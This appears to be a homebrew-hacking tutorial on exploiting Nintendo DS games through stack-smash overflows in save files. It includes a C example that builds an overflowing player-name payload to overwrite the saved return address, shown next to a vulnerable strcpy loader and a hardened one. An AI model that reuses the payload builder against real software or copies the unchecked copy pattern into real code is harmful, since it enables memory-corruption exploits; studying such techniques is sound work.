No$gba nds save file

Exploiting DS games through stack smash vulnerabilities in save files
Initial publication: March 11th, 2015

If you want to learn about hacking, then exploiting DS games through their save files can be a great way to learn the basics. DS games operate with very little security in place: if you have some code loaded in memory, you can often just jump straight to it. Compare this with more modern systems such as the 3DS, which has an NX bit (regions of memory can be marked non-executable), and the PS Vita, which additionally has ASLR (the base addresses of modules and the stack are randomised).

You should have a competent understanding of fairly low-level programming. If you don't know what a register is, or the difference between the stack and the heap, then you probably won't get much out of this tutorial. You will need an ARM compiler; I will be using devkitARM from devkitPro. You will need a DS emulator; I recommend DeSmuME, though I have heard that NO$GBA also has excellent debugging tools. You will need a hex editor to edit save files; I will be using Hex Editor Neo. I will also be using VBinDiff, which isn't necessary but helps to identify the location of checksums within a save file.

There are several different types of buffer overflow; in this tutorial we will just go over the most common, stack smashing: overflowing a string on the stack so that it overwrites a saved return address, which is later loaded into the Program Counter. In order to understand what a stack smash is and how it works, you will first need to know a little bit about ARM assembly.

Both ARM processors on the DS have 16 32-bit registers. The first 13 (R0 to R12) can be used for general-purpose calculations, and the last 3 have special purposes. R13, also referred to as SP, is the Stack Pointer: it points to the active stack, a region of memory onto which register contents are pushed and from which they are popped. R14, also referred to as LR, is the Link Register: it holds the address to return to after a function call, and a function that itself makes calls has to save LR on the stack, which is exactly the value a stack smash overwrites. R15, also referred to as PC, is the Program Counter: it holds the address of the instruction being executed (because of the pipeline, reading R15 directly actually yields the current instruction's address plus 8 in ARM state and plus 4 in Thumb state). In ARM state instructions are 4 bytes long, so once an instruction has completed the PC is incremented by 4 to point to the next instruction, unless the instruction itself modifies the PC. Also note that code is sometimes executed in Thumb state, which uses 2-byte instructions; on the DS's ARM9 a `pop {..., pc}` return uses bit 0 of the loaded address to select Thumb (1) or ARM (0) state (the ARM7 does not switch state on a pop), so the low bit of an overwritten return address matters.
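As an added worked example, not part of the original tutorial: the C program below models the stack frame of a save-file loader whose prologue is `push {r4, lr}` followed by `sub sp, sp, #16`, shows the unchecked `strcpy` pattern beside a bounds-checked version, and builds the overflowing name string that lands a chosen address on the saved LR with the Thumb bit set. The save layout (name at offset 0x10), the 16-byte buffer, the frame layout and the addresses 0x02345678 and 0x0200ABCD are all assumptions made for illustration, not taken from any real game.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed save layout for this example (constructed, not from a real game). */
#define SAVE_SIZE     0x200
#define NAME_OFFSET   0x10          /* NUL-terminated player name in the save */
#define NAME_BUF_SIZE 16            /* stack buffer the loader copies it into */

/*
 * Assumed frame of the loader, as laid out by this ARM prologue:
 *     push {r4, lr}        ; r4 at sp+0, lr at sp+4 (lowest register, lowest address)
 *     sub  sp, sp, #16     ; char name[16] now occupies sp+0 .. sp+15
 * so, relative to the buffer, r4 sits at +16 and the saved LR at +20.
 */
#define SAVED_R4_OFFSET (NAME_BUF_SIZE)
#define SAVED_LR_OFFSET (NAME_BUF_SIZE + 4)
#define FRAME_SIZE      (SAVED_LR_OFFSET + 4)

/* The vulnerable pattern: copy until NUL, trusting the save file.
 * Shown for comparison only; the simulation below never runs it on hostile data. */
void load_name_vulnerable(char *name, const uint8_t *save)
{
    strcpy(name, (const char *)save + NAME_OFFSET);
}

/* Hardened loader: the terminator must lie inside both the save image and the
 * destination buffer, otherwise the name is rejected instead of copied. */
bool load_name_safe(char *name, size_t name_size,
                    const uint8_t *save, size_t save_size)
{
    if (save_size <= NAME_OFFSET) return false;
    const uint8_t *src = save + NAME_OFFSET;
    const uint8_t *nul = memchr(src, 0, save_size - NAME_OFFSET);
    if (nul == NULL) return false;              /* runs off the end of the save */
    size_t len = (size_t)(nul - src);
    if (len >= name_size) return false;         /* would not fit with its NUL */
    memcpy(name, src, len + 1);
    return true;
}

static void put_le32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

/*
 * Build the overflowing name: filler up to the saved LR, then the target address
 * little-endian (the DS's ARM cores are little-endian), then a NUL so strcpy stops.
 * Bit 0 of the address selects the state a `pop {pc}` return lands in on the ARM9
 * (1 = Thumb, 0 = ARM). Returns the payload length excluding the NUL, or 0 if the
 * address itself contains a NUL byte, which strcpy would treat as end of string.
 */
size_t build_payload(uint8_t *out, size_t out_size, uint32_t target, bool thumb)
{
    if (out_size < SAVED_LR_OFFSET + 5) return 0;
    target = thumb ? (target | 1u) : (target & ~1u);
    uint8_t addr[4];
    put_le32(addr, target);
    for (int i = 0; i < 4; i++)
        if (addr[i] == 0) return 0;             /* would truncate the copy */
    memset(out, 'A', SAVED_LR_OFFSET);
    memcpy(out + SAVED_LR_OFFSET, addr, 4);
    out[SAVED_LR_OFFSET + 4] = 0;
    return SAVED_LR_OFFSET + 4;
}

/* Simulate the smash on a model of the frame (no real undefined behaviour): the
 * name is copied into a frame image large enough to hold the overflow, then the
 * saved LR slot is read back as the value the return would load into PC. */
uint32_t simulate_return_address(const uint8_t *payload, size_t len)
{
    uint8_t frame[FRAME_SIZE];
    memset(frame, 0, sizeof frame);
    put_le32(frame + SAVED_LR_OFFSET, 0x0200ABCDu); /* assumed legitimate return */
    size_t n = len < sizeof frame ? len : sizeof frame;
    memcpy(frame, payload, n);                  /* what the unchecked strcpy does */
    const uint8_t *p = frame + SAVED_LR_OFFSET;
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 |
           (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

int main(void)
{
    uint8_t save[SAVE_SIZE];
    memset(save, 0, sizeof save);
    size_t len = build_payload(save + NAME_OFFSET, SAVE_SIZE - NAME_OFFSET,
                               0x02345678u, true);
    char name[NAME_BUF_SIZE];
    printf("payload length %zu, hardened loader accepts it: %s\n", len,
           load_name_safe(name, sizeof name, save, sizeof save) ? "yes" : "no");
    printf("saved LR after overflow: 0x%08X\n",
           simulate_return_address(save + NAME_OFFSET, len));
    return 0;
}
```

The two things a practitioner checks before trying this on hardware are visible in the code: the overwriting address must contain no NUL byte or the copy stops short of the LR slot, and bit 0 has to match the state of the code you are jumping to. Whatever checksum the game keeps over the save region still has to be fixed up afterwards, which is what the VBinDiff step in the tutorial is for.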